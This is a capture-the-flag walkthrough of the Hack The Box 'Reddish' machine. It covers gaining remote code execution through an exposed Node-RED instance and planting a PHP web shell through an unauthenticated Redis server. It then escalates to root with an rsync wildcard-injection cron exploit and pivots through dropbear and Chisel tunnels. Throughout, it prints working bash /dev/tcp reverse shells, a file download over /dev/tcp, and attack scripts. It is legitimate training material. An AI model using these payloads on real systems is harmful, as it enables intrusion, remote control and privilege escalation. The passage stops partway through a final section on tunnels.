How do you seize control of a host located in a different subnetwork? The right answer: build numerous intricate tunnels. This article covers tunneling techniques and their application in pentesting, using as an example Reddish, a hardcore virtual machine (insane difficulty level: 8 out of 10) available on the Hack The Box training grounds.

Today, you will master the Node-RED visual programming tool, build a reverse shell, exploit a weak Redis configuration, use the rsync mirroring tool to access the file system of the target machine, and create a number of malicious cron jobs. Most importantly, you will take over the host by routing traffic between Docker containers through several TCP tunnels. Let’s get started.

Intelligence collection

First of all, it is necessary to collect as much information about the target system as possible.

Scanning ports

I run an Nmap scan and see that all 1000 ports scanned by default are closed, so I have no choice but to run a fast scan of the entire TCP range.

[panel template=term]

root@kali:~# nmap -n -Pn --min-rate=5000 -oA nmap/tcp-allports 10.10.10.94 -p-

root@kali:~# cat nmap/tcp-allports.nmap

...

Host is up (0.12s latency).

Not shown: 65534 closed ports

PORT STATE SERVICE

1880/tcp open vsat-control

...

[/panel]



The full scan detects only one open port, 1880, which is unfamiliar to me. I need more information about it.

[panel template=term]

root@kali:~# nmap -n -Pn -sV -sC -oA nmap/tcp-port1880 10.10.10.94 -p1880

root@kali:~# cat nmap/tcp-port1880.nmap

...

PORT STATE SERVICE VERSION

1880/tcp open http Node.js Express framework

|_http-title: Error

...

[/panel]

The scanner claims that this port is used by Express, a web application framework for Node.js. When I see the “web” prefix, I immediately open the browser…

Web – port 1880

I go to the page http://10.10.10.94:1880/ and see an error message.

There are two ways to find out what application is running on this port:

- save the website icon to your machine (normally, it can be found at /favicon.ico) and try to identify it using a reverse image search; or

- ask Google what programs normally use port 1880.

The second option is more casual but still effective: I enter a query, and the very first link reveals the Truth to me.

[panel]

Node-RED

According to the official website, Node-RED is a visual programming environment that makes it possible to wire together various components (from local devices to online API services). As far as I understand, Node-RED is often used to manage smart homes and other IoT devices.

[/panel]

OK, the software has been identified, but the 404 error persists.

[panel template=term]

root@kali:~# curl -i http://10.10.10.94:1880

HTTP/1.1 404 Not Found

X-Powered-By: Express

Content-Security-Policy: default-src 'self'

X-Content-Type-Options: nosniff

Content-Type: text/html; charset=utf-8

Content-Length: 139

Date: Thu, 30 Jan 2020 21:53:05 GMT

Connection: keep-alive

Cannot GET /

[/panel]

The first thing that comes to my mind is brute-forcing the directories. However, prior to doing so, I try to change the request from GET to POST.

[panel template=term]

root@kali:~# curl -i -X POST http://10.10.10.94:1880

HTTP/1.1 200 OK

X-Powered-By: Express

Content-Type: application/json; charset=utf-8

Content-Length: 86

ETag: W/"56-dJUoKg9C3oMp/xaXSpD6C8hvObg"

Date: Thu, 30 Jan 2020 22:04:20 GMT

Connection: keep-alive

{"id":"a237ac201a5e6c6aa198d974da3705b8","ip":"::ffff:10.10.14.19","path":"/red/{id}"}

[/panel]

As you can see, there was no need to brute-force anything. When I send a POST request to /, the server returns a JSON object containing an id and a path template (/red/{id}) that shows where to go next. This is actually logical: the Node-RED API documentation includes zillions of POST requests.
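Since the response is a small JSON object, the next URL can be assembled automatically instead of copying the id by hand. Below is a minimal sketch under two assumptions: the response is a flat, single-line JSON object like the one above, and jq is not at hand, so plain sed does the extraction (this is not a general JSON parser). The function name build_red_url is my own, hypothetical helper.

```bash
#!/usr/bin/env bash
# Hypothetical helper: turn the JSON returned by `curl -X POST /` into the
# Node-RED editor URL. Assumes a flat, single-line object such as
# {"id":"...","ip":"...","path":"/red/{id}"}; not a general JSON parser.
build_red_url() {
    local base="$1" json="$2" id path
    local placeholder='{id}'
    # Extract the value of the "id" key
    id=$(printf '%s' "$json" | sed -n 's/.*"id":"\([^"]*\)".*/\1/p')
    # Extract the path template, e.g. /red/{id}
    path=$(printf '%s' "$json" | sed -n 's/.*"path":"\([^"]*\)".*/\1/p')
    if [ -z "$id" ] || [ -z "$path" ]; then
        echo "unexpected response: $json" >&2
        return 1
    fi
    # Replace the literal {id} placeholder with the real id
    printf '%s%s/\n' "$base" "${path//"$placeholder"/$id}"
}
```

Usage: build_red_url http://10.10.10.94:1880 "$(curl -s -X POST http://10.10.10.94:1880)" prints the editor URL for the id the server hands out.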



So, I go to http://10.10.10.94:1880/red/a237ac201a5e6c6aa198d974da3705b8/ and see the following picture.

Let’s find out what can be done here.

Node-RED Flow

The Node-RED work area resembles a sandbox. I appreciate the great potential of this program, but what I need now is just one simple thing: a shell on the server.



I scroll down the palette of building blocks on the left (in Node-RED, they are called “nodes”) and find the Advanced section; it contains the exec node, so popular among hackers.

[panel]

Spice must FLOW

In the Node-RED philosophy, every combination created in the work area is called a “flow”. Flows can be built, deployed, imported, and exported to JSON. When you press the Deploy button, the server (surprise!) deploys all flows from all tabs of the work area.

[/panel]


simple-shell





Let’s try to build something. I start by deploying a simple shell.

The above scheme consists of the following colored blocks:

- The gray block on the left receives input data. The server makes a reverse connection to my IP and binds the input from my keyboard to the orange exec block.

- The orange block executes commands on the server. Its output is passed as input to the second gray block. Important: the orange block has three output terminals: stdout, stderr, and the return code (which I don’t use).

- The gray block on the right transmits the output data. To configure a block, double-click it to open its settings. I selected Reply to TCP to make sure that Node-RED sends responses back to me over the same connection.

The two gray blocks can be considered network pipes that carry the INPUT and OUTPUT of the exec block. For brevity, I don’t reproduce the entire flow exported to JSON here, but it can be found in my GitHub repository.



Then I launch a local listener in Kali and deploy the flow!

As you can see, this is a standard non-PTY shell.



beautiful-shell

Using this sandbox, I assembled a few more projects.



This is a more advanced shell: you can initiate the connection by pressing a button (the blue block), i.e. without redeploying the entire project; log events in the web interface (the green block; see the result in the screenshot below); and format the command output according to your own template (the yellow block).




file-upload

Next, I create a flow to upload files to the server.

When I press the Connect button, the server connects to port 8889 on my PC (where a listener with the required file is running) and saves the received information into the hidden file /tmp/.file (JSON).



To test this flow, I launch nc on Kali and have it serve lse.sh, a script for local reconnaissance on Linux targets (lately, I use it instead of the time-tested LinEnum.sh). Then I wait for the upload to complete and compare the checksums of the two copies.

Kali:

[panel template=term]

root@kali:~# nc -lvnp 8889 < lse.sh

…

root@kali:~# md5sum lse.sh

7d3a4fe5c7f91692885bbeb631f57c70 lse.sh

[/panel]

Node-RED:

[panel template=term]

root@nodered:/tmp# md5sum .file

7d3a4fe5c7f91692885bbeb631f57c70 .file

[/panel]
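Comparing two 32-character hashes by eye is error-prone, so here is a small helper that could be used on either side. It is a sketch: verify_md5 is my own, hypothetical name, and it assumes md5sum from coreutils, which is present on nodered as the listing above shows.

```bash
#!/usr/bin/env bash
# Compare a file's MD5 with a hash copied from the other machine.
# Returns 0 on match, 1 on mismatch, 2 if the file can't be read.
verify_md5() {
    local file="$1" expected="$2" actual
    if [ ! -r "$file" ]; then
        echo "cannot read $file" >&2
        return 2
    fi
    # md5sum prints "<hash>  <name>"; keep only the hash
    actual=$(md5sum -- "$file" | cut -d' ' -f1)
    if [ "$actual" = "$expected" ]; then
        echo "OK: $file"
    else
        echo "MISMATCH: $file ($actual != $expected)" >&2
        return 1
    fi
}
```

Usage on nodered: verify_md5 /tmp/.file 7d3a4fe5c7f91692885bbeb631f57c70, with the hash taken from the md5sum output on Kali.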

[panel]

File upload from the command line

Generally speaking, the file transfer mechanism described above is overkill: the entire procedure can be performed without leaving the terminal.

root@kali:~# nc -w3 -lvnp 8889 < lse.sh

root@nodered:~# bash -c 'cat < /dev/tcp/10.10.14.19/8889 > /tmp/.file'

[/panel]





reverse-shell

I wasn’t really happy with the shell built from Node-RED abstractions (some characters were displayed incorrectly, and the whole construction seemed unreliable). Therefore, I created a fully featured reverse shell.

Initially, I opened another port in a new terminal tab and launched a Bash TCP reverse shell as shown above. But then, to make my life easier in case I have to relaunch the session, I assembled the following flow in Node-RED (JSON).

[panel template=info]

Note that I wrapped the payload of my reverse shell in an additional Bash call, bash -c '…'. This ensures that the command is executed by the Bash interpreter, because the default shell on this host is dash.

node-red> ls -la /bin/sh

lrwxrwxrwx 1 root root 4 Nov 8 2014 /bin/sh -> dash

[/panel]

Now I can write a simple Bash script to trigger the callback in one click from the command line.

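#!/usr/bin/env bash

# Half a second later (once the listener is up), hit the Inject node of my flow
(sleep 0.5; curl -s -X POST http://10.10.10.94:1880/red/a237ac201a5e6c6aa198d974da3705b8/inject/7635e880.e6be48 >/dev/null &)

# Catch the callback; rlwrap adds line editing and command history
rlwrap nc -lvnp 8888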

The URL I pass to curl is the address of the Inject node in my flow (i.e. the Go! button in the picture above). In addition, I use rlwrap; otherwise, I could not use the arrow keys to move left and right along the input line or up and down through the command history.



So, I have got a shell; now it is time to find out where I am.



Docker. Container I: nodered

Once on the server, I quickly suspect that I am inside a Docker container: my shell came back running as the superuser (root).

The lse.sh script dropped on the target machine earlier confirms this suspicion.

Furthermore, there is a .dockerenv file in the root directory.

[panel template=term]

root@nodered:/node-red# ls -la /.dockerenv

-rwxr-xr-x 1 root root 0 May 4 2018 /.dockerenv

[/panel]
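Both indicators are easy to script. A minimal sketch, assuming the runtime is Docker specifically: it checks for /.dockerenv and, as a weaker hint, for “docker” in PID 1’s cgroup paths, which usually shows up on cgroup v1 hosts. The optional root argument is my own addition so that the check can be pointed at another directory tree (handy for testing).

```bash
#!/usr/bin/env bash
# Rough "am I in a Docker container?" check. ROOT (optional, my addition)
# lets the same test run against another directory tree; default is /.
looks_like_docker() {
    local root="${1:-}"
    # Docker places an empty .dockerenv file in the container's root
    if [ -e "$root/.dockerenv" ]; then
        return 0
    fi
    # Weaker hint: on cgroup v1 hosts, PID 1's cgroup paths usually mention docker
    grep -qs docker "$root/proc/1/cgroup"
}
```

Usage: looks_like_docker && echo "inside Docker".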





If you end up in a Docker container, check the network neighborhood first: there may be more containers in the chain. There is no ifconfig on this system, so I use ip addr to display information about the network interfaces.



As you can see, this container can communicate with two subnetworks: 172.18.0.0/16 and 172.19.0.0/16. In the first subnetwork, the IP address of this container (hereinafter nodered) is 172.18.0.2, while in the second subnetwork, it is 172.19.0.4. Let’s see what other hosts nodered has communicated with.

The ARP cache indicates that nodered knows at least two more hosts: 172.19.0.2 and 172.19.0.3 (I disregard the .1 hosts because, most probably, these are the default gateways to the host OS).

I have to run a scan to discover these hosts.

Host Discovery

The network neighborhood can be explored in various ways.

Ping Sweep

For instance, I can write a simple script that detects all network members using the Ping Sweep technique. The idea is simple: I send one ICMP request to each host in the 172.18.0.0/24 network and check the return code. If the host replies, a message is printed on the screen; otherwise, nothing happens.

#!/usr/bin/env bash

IP="$1"; for i in $(seq 1 254); do (ping -c1 $IP.$i >/dev/null && echo "ON: $IP.$i" &); done

In total, the scanned network segment can contain up to 254 hosts (256 addresses minus the network address and the broadcast address). I want the scan to take one minute, not 254 minutes; therefore, each ping is launched in its own background subshell. This is not really resource-consuming because the processes die pretty soon, and I get the result nearly instantly.
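One side effect of the one-liner: since every ping is detached into its own subshell, the loop returns at once and the ON: lines keep trickling in afterwards. Here is a sketch of the same sweep that waits for all probes before returning. It assumes iputils (or BusyBox) ping, whose -W option sets how many seconds to wait for a reply; the function names are my own.

```bash
#!/usr/bin/env bash
# Ping sweep of a /24, same idea as above, but waits for all probes to finish.

# Print the 254 usable addresses of a /24 given its first three octets
hosts_in_24() {
    local prefix="$1" i
    for i in $(seq 1 254); do
        echo "$prefix.$i"
    done
}

ping_sweep() {
    local ip
    for ip in $(hosts_in_24 "$1"); do
        # One background job per host; only live hosts produce output
        ping -c1 -W1 "$ip" >/dev/null 2>&1 && echo "ON: $ip" &
    done
    wait  # block until every background ping has exited
}
```

Usage: ping_sweep 172.19.0 | sort -t. -k4 -n prints the live hosts in address order.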

[panel template=term]

root@nodered:~# IP="172.18.0"; for i in $(seq 1 254); do (ping -c1 $IP.$i >/dev/null && echo "ON: $IP.$i" &); done

ON: 172.18.0.1 <-- Default gateway for nodered (host)

ON: 172.18.0.2 <-- Docker container nodered

[/panel]

The scan of this subnetwork returns only the gateway and the current container. Let’s try 172.19.0.0/24.

[panel template=term]

root@nodered:~# IP="172.19.0"; for i in $(seq 1 254); do (ping -c1 $IP.$i >/dev/null && echo "ON: $IP.$i" &); done

ON: 172.19.0.1 <-- Default gateway for nodered (host)

ON: 172.19.0.2 <-- ???

ON: 172.19.0.3 <-- ???

ON: 172.19.0.4 <-- Docker container nodered

[/panel]

So, there are two unknown hosts to be examined soon. But first, let’s discuss another host discovery method.

Static Nmap

From Kali, I drop a statically compiled copy of Nmap onto nodered together with the /etc/services file (it maps service names to port numbers, which the scanner needs) and launch host discovery.

[panel template=term]

root@nodered:/tmp# ./nmap -n -sn 172.18.0.0/24 2>/dev/null | grep -e 'scan report' -e 'scanned in'

Nmap scan report for 172.18.0.1

Nmap scan report for 172.18.0.2

Nmap done: 256 IP addresses (2 hosts up) scanned in 2.01 seconds

[/panel]

Nmap found two hosts in the 172.18.0.0/24 subnetwork…

[panel template=term]

root@nodered:/tmp# ./nmap -n -sn 172.19.0.0/24 2>/dev/null | grep -e 'scan report' -e 'scanned in'

Nmap scan report for 172.19.0.1

Nmap scan report for 172.19.0.2

Nmap scan report for 172.19.0.3

Nmap scan report for 172.19.0.4

Nmap done: 256 IP addresses (4 hosts up) scanned in 2.02 seconds

[/panel]

…and four hosts in the 172.19.0.0/24 subnetwork. This result exactly matches the one obtained using Ping Sweep.

Scanning unknown hosts

To find out what ports are open on the two unknown hosts, I can write a one-line Bash script.

#!/usr/bin/env bash

IP="$1"; for port in $(seq 1 65535); do (echo '.' >/dev/tcp/$IP/$port && echo "OPEN: $port" &) 2>/dev/null; done

The script is similar to ping-sweep.sh, but instead of running ping, it writes a test character directly to the scanned port. On the other hand, why spend time and effort on this if I can use Nmap?
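The one-liner has two caveats: it spawns up to 65,535 background subshells at once, and a connection attempt to a filtered port can hang for a long time. A gentler sketch probes ports one by one and wraps each attempt in the coreutils timeout command (an assumption: it must exist on the scanning host). It is much slower than Nmap, so Nmap remains the better choice whenever it is available.

```bash
#!/usr/bin/env bash
# TCP connect scan through Bash's /dev/tcp pseudo-device, one port at a time.
# Assumes coreutils `timeout` is available on the host running the scan.

# Succeed if HOST:PORT accepts a TCP connection within one second
port_open() {
    local host="$1" port="$2"
    # Opening fd 3 on /dev/tcp/HOST/PORT performs the TCP handshake;
    # `timeout` kills the attempt if a filtered port never answers
    timeout 1 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
}

# Print every open port in the inclusive range FIRST..LAST (default: all)
scan_ports() {
    local host="$1" first="${2:-1}" last="${3:-65535}" port
    for ((port = first; port <= last; port++)); do
        if port_open "$host" "$port"; then
            echo "OPEN: $port"
        fi
    done
}
```

Usage: scan_ports 172.19.0.3 1 1024 checks the first 1024 ports of the web host.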

[panel template=term]

root@nodered:/tmp# ./nmap -n -Pn -sT --min-rate=5000 172.19.0.2 -p-

...

Unable to find nmap-services! Resorting to /etc/services

Cannot find nmap-payloads. UDP payloads are disabled.

...

Host is up (0.00017s latency).

Not shown: 65534 closed ports

PORT STATE SERVICE

6379/tcp open unknown

...

root@nodered:/tmp# ./nmap -n -Pn -sT --min-rate=5000 172.19.0.3 -p-

...

Unable to find nmap-services! Resorting to /etc/services

Cannot find nmap-payloads. UDP payloads are disabled.

...

Host is up (0.00013s latency).

Not shown: 65534 closed ports

PORT STATE SERVICE

80/tcp open http

...

[/panel]

Two open ports have been discovered, one on each unknown host. First, I will try to access the web server on port 80 and then proceed to port 6379.

Tunneling

To get to remote port 80, I have to build a tunnel from my PC to the host 172.19.0.3. This can be done in many ways, for instance:

- use Metasploit and add a route through a meterpreter session;

- initiate a reverse SSH connection where the attacker’s machine acts as the server, while the nodered container acts as the client; or

- use third-party applications designed to build tunnels between nodes.

In theory, I could also use the Node-RED sandbox and create a flow that routes traffic from the attacker’s machine to the unknown hosts, but… this task seems extremely labor-intensive and probably infeasible.

The Metasploit variant was covered in the previous article, so I am not going to discuss it here. The second variant was also explained in that publication (see the chapter “Reverse SSH tunnel”), but only for Windows, while now I am dealing with Linux. Therefore, I am going to briefly show how to use the reverse SSH technique and then address in detail the third scenario involving special tunneling software.

Reverse SSH (an example)

To create a reverse SSH tunnel, I need a portable client to be dropped onto nodered. I will use the dropbear client created by Australian developer Matt Johnston.

I download the source code from the author’s homepage and statically compile the client on my PC.

[panel template=term]

root@kali:~# wget https://matt.ucc.asn.au/dropbear/dropbear-2019.78.tar.bz2

root@kali:~# tar xjvf dropbear-2019.78.tar.bz2 && cd dropbear-2019.78

root@kali:~/dropbear-2019.78# ./configure --enable-static && make PROGRAMS='dbclient dropbearkey'

root@kali:~/dropbear-2019.78# du -h dbclient

1.4M dbclient

[/panel]

The resulting binary is 1.4 MB in size. It can be shrunk almost threefold with two simple commands.

[panel template=term]

root@kali:~/dropbear-2019.78# make strip

root@kali:~/dropbear-2019.78# upx dbclient

root@kali:~/dropbear-2019.78# du -h dbclient

520K dbclient

[/panel]

First, I strip the debugging information using the strip target of the Makefile and then compress the file with UPX, a packer for executable files.



Then I generate a public key and a private key using dropbearkey and drop the client and the private key on nodered.

[panel template=term]

root@kali:~/dropbear-2019.78# ./dropbearkey -t ecdsa -s 521 -f .secret

Generating 521 bit ecdsa key, this may take a while...

Public key portion is:

ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA1MjEAAAAIbmlzdHA1MjEAAACFBAA2TCQk3VTYCX/hZjMmXT0/A27f5EOKQY4FbXcYeNWXIPLFQOOLnQFWbAjBa9qOUdmwOipVvDwXnvt6hEmwitflvQEIw9wHQ4spUAqs/0CR6AoiTT3w7v6CAX/uq0u2oS7gWf9SPy/Npz8Ond6XJKh+d0QPXz0uQrq0wyprCYo+g/OiEA== root@kali

Fingerprint: sha1!! ef:6a:e8:e0:f8:49:f3:cb:67:34:5d:0b:f5:cd:c0:e5:8e:49:28:41

[/panel]

Voila! The SSH client and a 521-bit private key (generated using elliptic-curve cryptography) have been dropped into the container. Then, on Kali, I create a dummy user with /bin/false as the shell to protect my PC in case somebody finds the private key: the key cannot be used to get a shell on my machine.

[panel template=term]

root@kali:~# useradd -m snovvcrash

root@kali:~# vi /etc/passwd

... Replacing the snovvcrash's shell with "/bin/false" ...

root@kali:~# mkdir /home/snovvcrash/.ssh

root@kali:~# vi /home/snovvcrash/.ssh/authorized_keys

... Copying the public key ...

[/panel]

Everything is ready, so I create the tunnel.

[panel template=term]

root@nodered:/tmp# ./dbclient -f -N -R 8890:172.19.0.3:80 -i .secret -y snovvcrash@10.10.14.19

[/panel]

- -f forks the client into the background after authenticating on the server;

- -N runs no commands on the server and requests no remote shell;

- -R 8890:172.19.0.3:80 listens on localhost:8890 on Kali and forwards everything received there to 172.19.0.3:80;

- -i .secret authenticates using the .secret private key;

- -y automatically accepts the server’s host key and adds its fingerprint to the list of trusted hosts.

On Kali, you can check whether the tunnel was created using either the classic netstat or its newer alternative, ss.

[panel template=term]

root@kali:~# netstat -alnp | grep LIST | grep 8890

tcp 0 0 127.0.0.1:8890 0.0.0.0:* LISTEN 236550/sshd: snovvc

tcp6 0 0 ::1:8890 :::* LISTEN 236550/sshd: snovvc

root@kali:~# ss | grep 1880

tcp ESTAB 0 0 10.10.14.19:43590 10.10.10.94:1880

[/panel]



I open localhost:8890 in the browser and see the endpoint I have laid the route to.

It works! I like such messages.

As said above, this was just an example. From this point forward, I will work my way through the Reddish VM using a client-server utility called Chisel.

Chisel

“Chisel is a fast TCP tunnel, transported over HTTP, secured via SSH.”

This is how the creator of Chisel describes it. Short and to the point.

Generally speaking, Chisel is a “client + server” combination in one app written in Go. It can build protected tunnels and circumvent firewall restrictions. I am going to use Chisel to set up a reverse connection from the nodered container to Kali. Functionally, Chisel resembles SSH tunneling, including the command syntax.











To avoid confusion, I am going to draw a ‘network map’ and update it as I progress through the Reddish VM. So far, I possess information only about nodered and www.

I download and build Chisel in Kali.

[panel template=term]

root@kali:~# git clone http://github.com/jpillora/chisel && cd chisel

root@kali:~/chisel# go build

root@kali:~/chisel# du -h chisel

12M chisel

[/panel]

The executable file is 12 MB in size, which is quite a lot considering that it must be transferred to the target machine. I am going to shrink the binary the same way as dropbear: strip the debug information using the -ldflags linker flags (-s omits the symbol table, -w omits the DWARF debugging information) and then pack the file with UPX.

[panel template=term]

root@kali:~/chisel# go build -ldflags='-s -w'

root@kali:~/chisel# upx chisel

root@kali:~/chisel# du -h chisel

3.2M chisel

[/panel]

Terrific! Now it is time to drop chisel into the container and create a tunnel.

[panel template=term]

root@kali:~/chisel# ./chisel server -v -reverse -p 8000

[/panel]

First, I launch a server on Kali; it listens on port 8000 (-p 8000) and allows clients to open reverse tunnels (-reverse).

[panel template=term]

root@nodered:/tmp# ./chisel client 10.10.14.19:8000 R:127.0.0.1:8890:172.19.0.3:80 &

[/panel]

Then I connect to this server using the client on nodered. The above command opens port 8890 on Kali (the R prefix), and the traffic goes through this port to port 80 on the host 172.19.0.3. If you don’t specify the listening interface for the reverse connection (in this particular case, 127.0.0.1), the program will use 0.0.0.0. This means that any network member would be able to use my PC to reach 172.19.0.3:80. Of course, this is unacceptable to me, so I have to set 127.0.0.1 manually. This is a difference from the standard SSH client, which binds remote forwards to 127.0.0.1 by default.
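Because forgetting the bind address silently exposes the forwarded port on all of Kali’s interfaces, it can be handy to generate reverse remotes with a tiny helper that always puts 127.0.0.1 in front. This is a hypothetical helper of my own, following the R:&lt;bind address&gt;:&lt;port&gt;:&lt;target host&gt;:&lt;target port&gt; form used in the command above.

```bash
#!/usr/bin/env bash
# Hypothetical helper: print a Chisel reverse-remote spec whose listener is
# always bound to 127.0.0.1 on the server (Kali), in the
# R:<bind>:<port>:<target host>:<target port> form used above.
chisel_reverse_remote() {
    local listen_port="$1" target_host="$2" target_port="$3"
    if [ -z "$listen_port" ] || [ -z "$target_host" ] || [ -z "$target_port" ]; then
        echo "usage: chisel_reverse_remote LISTEN_PORT TARGET_HOST TARGET_PORT" >&2
        return 1
    fi
    printf 'R:127.0.0.1:%s:%s:%s\n' "$listen_port" "$target_host" "$target_port"
}
```

Usage: ./chisel client 10.10.14.19:8000 "$(chisel_reverse_remote 8890 172.19.0.3 80)" & produces the same tunnel as the command above.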

Website research

I open localhost:8890 in the browser and see the good news again: “It works!” Then I open the source code of this web page.



I won’t paste the entire source code here; see below a screenshot showing the most exciting parts.

A comment in the blue frame indicates the existence of a database container that has access to the web folder of this server. The arguments of the test function (in red), combined with the reference to a database, resemble the GET and INCR commands of Redis, a NoSQL DBMS. You can play with the test AJAX requests in the browser and see that they work properly, unlike the backup function, which is not implemented yet.

Everything adds up so far, and I think I know where to look for Redis: as you remember, there is one more unidentified host whose port 6379 is open… And this is exactly the default port for Redis.

Redis



I create one more reverse tunnel to Kali; it leads to port 6379 on 172.19.0.2.

[panel template=term]

root@nodered:/tmp# ./chisel client 10.10.14.19:8000 R:127.0.0.1:6379:172.19.0.2:6379 &

[/panel]

Now I can knock on the Redis door from my machine. For instance, I can scan port 6379 with Nmap using NSE scripts to identify the services. I use the -sT flag because raw packets cannot be transmitted through tunnels.

[panel template=term]

root@kali:~# nmap -n -Pn -sT -sV -sC localhost -p6379

...

PORT STATE SERVICE VERSION

6379/tcp open redis Redis key-value store 4.0.9

...

[/panel]

The author of this post recommends checking whether the database requires authentication.

Apparently, authentication is not required; so, I continue exploring this attack vector. I won’t inject my public key into the container to establish an SSH connection as Packet Storm recommends (because there is no SSH here); instead, I am going to upload the web shell into the shared folder of the web server.

I could use a simple netcat/telnet connection to talk to the DBMS, but it is much more elegant to build the native CLI client from the Redis sources.

[panel template=term]

root@kali:~# git clone https://github.com/antirez/redis && cd redis

root@kali:~/redis# make redis-cli

root@kali:~/redis# cd src/

root@kali:~/redis/src# file redis-cli

redis-cli: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c6e92b4603099564577d4027ba5fd7f20da68230, for GNU/Linux 3.2.0, with debug_info, not stripped

[/panel]



To make sure that it works, I try commands present in the source code of the web page.

Everything works fine. Now it is time to do something really malicious: for instance, write the web shell into /var/www/html/. To do so, I use the following sequence of commands:

- flushall (delete all keys of all existing databases);

- set (create a new key whose value is the web shell);

- config set dbfilename (set the name of the database file);

- config set dir (set the directory where the database file will be saved); and

- save (write the database file to disk).

[panel template=info]

Interestingly, Redis may compress stored values that contain repeating patterns when it saves the database; as a result, a payload embedded in the database file may break.

[/panel]

I am going to write a Bash script that implements the five steps listed above. Automation is required because, as you will see soon, the web folder is wiped every three minutes:

#!/usr/bin/env bash

~/redis/src/redis-cli -h localhost flushall

~/redis/src/redis-cli -h localhost set pwn ''

~/redis/src/redis-cli -h localhost config set dbfilename shell.php

~/redis/src/redis-cli -h localhost config set dir /var/www/html/

~/redis/src/redis-cli -h localhost save



The script has been executed successfully; so, I can open the browser, go to http://localhost:8890/shell.php?cmd=whoami, and get the following response.

So, I can remotely execute commands in the container 172.19.0.3 (hereinafter www, as it calls itself).



Having an RCE, it would be great to get a shell.

Docker. Container II: www

The problem is that the www host can communicate only with nodered (i.e. it cannot connect to Kali directly). So, I have no choice but to create yet another tunnel (the third one) alongside the existing reverse tunnels and catch the callback from www on Kali through this new tunnel. This third tunnel will be a direct (or ‘local’) one.

[panel template=term]

root@nodered:/tmp# ./chisel client 10.10.14.19:8000 7001:127.0.0.1:9001 &

[/panel]

By entering the above command, I connect to the server 10.10.14.19:8000 and simultaneously create a tunnel that begins on port 7001 of the nodered container and ends on port 9001 of the Kali VM. Now everything that arrives at 172.19.0.4:7001 is automatically redirected to the attacker’s machine at 10.10.14.19:9001. In other words, I can point a reverse shell at the container address 172.19.0.4:7001 (RHOST:RPORT), while the callback comes to my machine at 10.10.14.19:9001 (LHOST:LPORT). As simple as that!

I added two lines to the pwn-redis.sh script to send the shell and launch a listener on port 9001.

...

(sleep 0.1; curl -s -X POST -d 'cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.19.0.4%2F7001%200%3E%261%27' localhost:8890/shell.php >/dev/null &)

rlwrap nc -lvnp 9001

The payload for curl is percent-encoded to avoid problems with ‘bad’ characters. This is how it looks in ‘human’ language:

bash -c 'bash -i >& /dev/tcp/172.19.0.4/7001 0>&1'
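Encoding the payload by hand is error-prone. Here is a minimal sketch of a pure-Bash percent-encoder (urlencode is my own name), assuming ASCII input: it keeps the RFC 3986 unreserved characters and encodes every other byte as %XX. Applied to the command above, it reproduces exactly the string passed to curl in pwn-redis.sh.

```bash
#!/usr/bin/env bash
# Percent-encode a string byte by byte: RFC 3986 unreserved characters
# (A-Z a-z 0-9 - . _ ~) pass through, everything else becomes %XX.
urlencode() {
    local LC_ALL=C   # iterate over bytes, not multibyte characters
    local s="$1" out="" c i
    for ((i = 0; i < ${#s}; i++)); do
        c="${s:i:1}"
        # printf with a leading quote ("'c") yields the character's code
        case "$c" in
            [A-Za-z0-9._~-]) out+="$c" ;;
            *) out+=$(printf '%%%02X' "'$c") ;;
        esac
    done
    printf '%s\n' "$out"
}
```

Usage: curl -s -X POST -d "cmd=$(urlencode "bash -c 'bash -i >& /dev/tcp/172.19.0.4/7001 0>&1'")" localhost:8890/shell.php. Alternatively, curl can do the encoding itself with its --data-urlencode option.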

Now I can get a session on www in one step.

Let’s look around.

First, this container also has access to two subnetworks: 172.19.0.0/16 and 172.20.0.0/16.





An interesting directory is present in the root folder: /backup. Such directories are pretty common on Hack The Box virtual machines (and in real life as well). Inside it, there is a script called backup.sh:

cd /var/www/html/f187a0ec71ce99642e4f0afbd441a68b

rsync -a *.rdb rsync://backup:873/src/rdb/

cd / && rm -rf /var/www/html/*

rsync -a rsync://backup:873/src/backup/ /var/www/html/

chown www-data. /var/www/html/f187a0ec71ce99642e4f0afbd441a68b

I can see that this script:

- interacts with the backup host, which is yet unknown to me;

- uses rsync to back up all files with the .rdb extension (i.e. Redis database files) to a remote server called backup; and

- uses rsync to restore the content of /var/www/html/ from a backup copy (also stored somewhere on the backup server).



Here is the vulnerability: the admin uses * to address all .rdb files. The shell expands the wildcard into a list of file names before rsync sees them, and rsync has an option that runs a command: -e, which sets the remote shell to use. So, an attacker can create a file whose name looks like this option and make rsync execute arbitrary commands on behalf of the user who runs backup.sh.
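To see why the file name matters, it helps to look at what the shell actually hands to rsync. The harmless sketch below (demo_glob_injection is my own, hypothetical name) recreates the two file names used in the next step in a scratch directory and prints, one per line, the arguments that *.rdb expands to. It executes nothing and does not involve rsync.

```bash
#!/usr/bin/env bash
# Harmless demo: recreate the two file names in a scratch directory and
# show, one per line, the arguments that the glob *.rdb expands to.
# Nothing is executed and rsync is not involved.
demo_glob_injection() {
    local dir
    dir=$(mktemp -d) || return 1
    (
        cd "$dir" || exit 1
        : > 'pwn-rsync.rdb'
        : > '-e bash pwn-rsync.rdb'
        LC_ALL=C          # byte-wise sort order for the glob expansion
        printf '%s\n' *.rdb
    )
    rm -rf -- "$dir"
}
```

The first argument starts with -e, so, as far as I understand, rsync parses it as its -e option rather than as a file name, and the rest of the name (bash pwn-rsync.rdb) becomes the remote-shell command. The usual defense is to write ./*.rdb or to put -- before the wildcard, so that no expanded name can be mistaken for an option.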

I bet the script is scheduled as a cron job.

Wow! It will be executed on behalf of root! Time to exploit this vulnerability.

Privilege escalation to root

First, I create a file called pwn-rsync.rdb in the /var/www/html/f187a0ec71ce99642e4f0afbd441a68b directory. The file contains the reverse shell repeatedly mentioned in this article.

bash -c 'bash -i >& /dev/tcp/172.19.0.4/1337 0>&1'

Then I create another file with a rather unusual name: -e bash pwn-rsync.rdb. Below is the directory listing right before the shell arrives:

[panel template=term]

www-data@www:/var/www/html/f187a0ec71ce99642e4f0afbd441a68b$ ls

-e bash pwn-rsync.rdb

pwn-rsync.rdb

[/panel]

I open a new tab in the terminal and wait for the cron job to execute.



Voila! I have a root shell!

[panel]

More tunnels!

As you can guess, the reverse shell connects back to the nodered container, and I receive it on Kali. To make this possible, I had to lay one more local tunnel on port 1337 from nodered to my computer.

